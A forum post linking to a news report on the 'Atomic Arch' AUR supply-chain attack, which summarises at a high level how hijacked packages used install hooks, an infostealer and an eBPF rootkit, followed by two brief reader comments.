Atomic Arch: 900+ AUR Packages Backdoored with eBPF RootkitCopy
(thecybersecguru.com)
from WPSteam@lemmy.world to cybersecurity@infosec.pub on 13 Jun 14:48
https://lemmy.world/post/48117869
from WPSteam@lemmy.world to cybersecurity@infosec.pub on 13 Jun 14:48
https://lemmy.world/post/48117869
Atomic Arch is a major AUR supply-chain attack (over 1.5K packages affected as of now) where attackers hijacked orphaned Arch packages and used malicious install hooks to pull npm payloads that executed a Linux ELF infostealer. It targeted developer secrets like SSH keys, GitHub/npm tokens, browser sessions, Docker/Vault credentials, and chat app data, while also using an eBPF rootkit to hide itself when run as root.
threaded - newest
Update: seems like there’s a 2nd wave of attack…a bit more sophisticated than the initial wave…has begun. Code is more obfuscated
The use of eBPF hooks as a rootkit is particularly insidious because it leverages the kernel’s own tracing infrastructure to hide malicious processes, effectively bypassing standard process monitoring. This supply-chain compromise highlights the critical risk of relying on unverified third-party repositories, where a single malicious hook can persist across multiple package versions and silently exfiltrate sensitive credentials.